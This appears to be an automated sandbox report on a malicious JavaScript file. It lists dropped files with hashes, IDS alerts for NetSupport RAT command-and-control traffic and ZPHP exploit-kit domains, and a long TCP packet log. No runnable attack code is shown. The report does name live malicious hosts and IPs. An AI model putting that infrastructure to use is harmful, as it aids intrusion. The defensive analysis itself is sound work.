                                                                                                                                                                              SHA-256:E0FF12DD4DBAD622CF4596EF3C00296E99D47AA8E038D32209323887FBA730DA
                                                                                                                                                                              SHA-512:75DDF226A14515D61A66E9C6C5E5535B0EA6F5C7510D5F8140B7DF7DAB5BEFA2CE2AAB240BC6E3663189DF8D22D860590950A4E39C1D2069294C0B15EA695BF7
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:PK..........WW..%..m..........client32.exe.\w\TG.>K...D%&..)&.M._.E....D`.....P.$...k.h4&F.. .........{4.z....]X.\..?<..3w...>g..Y.9.m5......`/.b.../.a..CH.=.y.h...N.A..gN..).j.#.6mz.......i.A...u4.:.....@...F.i....*..b...t..S.v?...6...=...s.?;....~M..8[.."...4.Aq./P......Q%L........2.k..8.a..Y.....+..t..u'..........7...j3:..A[:..........!~sB.U.@xV..:..^.3}%!..."....j.gM_...f....zRa&.u...2......l..gJ.-..........c...gm...Q#8.$.8o.x4.sk.(Z..Kh.eCEC.<..z....%.@...-...j04W..y....V.k.i..~...:........bC..>......c.....f$..?.&Q..5......T.*g.[[:.......)..K..u..u...Me;.Ng.6.r%.(*.%.Q.V..Juey.j.i.8.fJ....?.....f...?..2..D.s.B....7k.......3.7t..p.4.)~....5.............Et.f...2:h.)..u..U.$qp..x}..>]>...".0v..v...l....J....>..S8...N..7.O2..E.......ai..{.z.......t.Jg#.{....|.......f...#TY..t.3k.IgM:...v..L..s....'.......lu..?u...g....O..A.(_....w...i..7q}B.....>...K......1M\.K.O}D.D.=..!..Q.N}..H.?......>tDu.....t.o..Nu..z...,.U.A......."`.FQ....

                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\wscript.exe
                                                                                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):7168
                                                                                                                                                                              Entropy (8bit):4.325332401861347
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:48:rPmsPPynv51mpVW0T1MqughNY1IkAKOSuPlQVqSuZOua3Naikg5A0G2adRWUt6qH:LxWCJ4ClYwNBdR8Qut4L93
                                                                                                                                                                              MD5:D524C0022928E3556F2629BAD177C26F
                                                                                                                                                                              SHA1:D2CDA4773905A903910DF3E1F52416164780B961
                                                                                                                                                                              SHA-256:45AE7009AB263FC11CD602407C567274D3E6D503F8634CA9DF89D37645183A73
                                                                                                                                                                              SHA-512:EFFDF2C2E22BC00009C7A056E84FD6B8568C6C7D1F870E438156AC2A0C066851C9964B64BD89D5336C590649B55BF31C1BC092492C00BE9F3199652C13E18981
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                              Static File Info

                                                                                                                                                                              General

                                                                                                                                                                              File type:ASCII text, with CRLF line terminators
                                                                                                                                                                              Entropy (8bit):5.014449657027976
                                                                                                                                                                              TrID:
                                                                                                                                                                              • Java Script (8502/1) 68.00%
                                                                                                                                                                              • Digital Micrograph Script (4001/1) 32.00%
                                                                                                                                                                              File name:5j0fix05fy.js
                                                                                                                                                                              File size:6'302'081 bytes
                                                                                                                                                                              MD5:c7948bba3c4c8ac9be2b72cc10e7df54
                                                                                                                                                                              SHA1:4b6ed5bdb4fb5f8b4e50264530bc3f83e2075fc6
                                                                                                                                                                              SHA256:84bf3a782161537926aa8fd1061d852d33ebbf57889521c99e9b3c8b79f22571
                                                                                                                                                                              SHA512:fa5bcf56ec830ea4515933e6f4385ff77292e39c4ee5d4042a75a217f7a78eeb4293fdbeb50f9a124cb747b8beb076ad2ca823e14c03e34d51bfceca99b76312
                                                                                                                                                                              SSDEEP:49152:QRvj5j2L9f8wzJaeTmsyiBaQSd0B8g3YbmrtYk/FAgHIQVSqiQFXcmYx2NRotbM5:H
                                                                                                                                                                              TLSH:AD56D88CB7EF115A895333288B7E540AE63CC0375509C9687D9DD2945FE842863AEFF8
                                                                                                                                                                              File Content Preview:/*.. * The licenses this file.. * to you under the Apache License (the file.. * "License"); is distributed on an.. * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY.. * KIND..... */....(function(Variable1, Variable2) {...typeof stylo === 'object2'

                                                                                                                                                                              File Icon

                                                                                                                                                                              Icon Hash:68d69b8bb6aa9a86

                                                                                                                                                                              Network Behavior

                                                                                                                                                                              Suricata IDS Alerts

                                                                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                              2024-12-17T18:12:21.687029+01002827745ETPRO MALWARE NetSupport RAT CnC Activity1192.168.2.449739194.180.191.64443TCP
                                                                                                                                                                              2024-12-17T18:12:22.892738+01002058315ET EXPLOIT_KIT ZPHP Domain in DNS Lookup (depostsolo .biz)1192.168.2.4641141.1.1.153UDP
                                                                                                                                                                              2024-12-17T18:12:24.747215+01002058319ET EXPLOIT_KIT ZPHP Domain in TLS SNI (depostsolo .biz)1192.168.2.44973198.142.240.215443TCP
                                                                                                                                                                              2024-12-17T18:12:53.391344+01002058314ET EXPLOIT_KIT ZPHP Domain in DNS Lookup (businessinsanjose .info)1192.168.2.4559881.1.1.153UDP
                                                                                                                                                                              2024-12-17T18:12:55.545266+01002058318ET EXPLOIT_KIT ZPHP Domain in TLS SNI (businessinsanjose .info)1192.168.2.44973898.142.240.215443TCP

                                                                                                                                                                              Network Port Distribution

                                                                                                                                                                              TCP Packets

                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                              Dec 17, 2024 18:12:23.412130117 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:23.412175894 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:23.417062044 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:23.440016985 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:23.440047026 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:24.747051954 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:24.747215033 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:25.035445929 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:25.035482883 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:25.035881996 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:25.035943985 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:25.040406942 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:25.040587902 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:25.040621042 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:25.570550919 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:25.570588112 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:25.570627928 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:25.570658922 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:25.570677996 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:25.570713043 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:25.681854010 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:25.681938887 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:25.681965113 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:25.682008028 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:25.775541067 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:25.775619984 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:25.775636911 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:25.775676966 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:25.797593117 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:25.797910929 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:25.797929049 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:25.797971010 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:25.824987888 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:25.825061083 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:25.825084925 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:25.825138092 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:25.842590094 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:25.842730999 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:25.842744112 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:25.842783928 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:25.953768969 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:25.953850031 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:25.953866959 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:25.953918934 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:25.972054958 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:25.972132921 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:25.972145081 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:25.972182035 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:25.983716965 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:25.983799934 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:25.983809948 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:25.983849049 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:25.999170065 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.003139973 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.003150940 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.003202915 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.010889053 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.010961056 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.010970116 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.011027098 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.022897005 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.022964954 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.022985935 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.023025990 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.038100958 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.038204908 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.038220882 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.038259983 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.049818993 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.049901962 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.049917936 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.049969912 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.149080038 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.149199963 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.149228096 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.149358988 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.159843922 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.159979105 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.160001993 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.160043955 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.168777943 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.168858051 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.168878078 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.169039965 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.177231073 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.177326918 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.177349091 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.177391052 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.188803911 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.188930988 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.188950062 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.189004898 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.196130037 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.196289062 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.196300983 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.196386099 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.204133987 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.204224110 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.204235077 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.204268932 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.213226080 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.213310003 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.213320017 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.213366032 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.224317074 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.224461079 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.224481106 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.224560022 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.231483936 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.231561899 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.231574059 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.231611013 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.239728928 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.239912987 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.239939928 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.239989996 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.250766039 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.250845909 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.250863075 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.250941992 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.334681988 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.334780931 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.334806919 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.334850073 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.340241909 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.340320110 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.340329885 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.340368986 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.348896980 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.348995924 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.349004984 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.349042892 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.354768038 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.354851007 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.354859114 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.354897022 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.360404968 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.360496044 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.360502958 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.360538006 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.367530107 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.367624044 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.367630959 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.367667913 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.373008966 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.373106956 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.373115063 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.373152971 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.379816055 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.379913092 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.379930019 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.379975080 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.384716034 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.384814024 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.384829044 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.384869099 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.388917923 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.388988972 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.389003992 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.389046907 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.392333984 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.392398119 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.392411947 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.392446995 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.395219088 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.395307064 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.395320892 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.395359039 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.399089098 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.399175882 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.399184942 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.399223089 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.402285099 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.402364969 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.402380943 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.402424097 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.406136990 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.406229973 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.406246901 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.406289101 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.526937962 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.527082920 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.527102947 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.527147055 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.529887915 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.529966116 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.529977083 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.530019999 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.532895088 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.532973051 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.532983065 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.533021927 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.536760092 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.536837101 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.536848068 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.536885023 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.539777994 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.539869070 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.539879084 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.539916039 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.542974949 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.543047905 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.543055058 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.543092012 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.546857119 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.546924114 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.546932936 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.546968937 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.550059080 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.550139904 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.550148010 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.550184965 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.553061962 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.553137064 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.553148031 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.553184032 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.556888103 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.556952000 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.556962013 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.556998968 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.560308933 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.560403109 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.560410976 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.560455084 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.563482046 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.563553095 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.563560009 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.563596010 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.566936016 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.567030907 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.567039967 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.567078114 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.570559025 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.570633888 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.570645094 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.570698023 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.573592901 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.573664904 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:26.573676109 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:26.573712111 CET49731443192.168.2.498.142.240.215
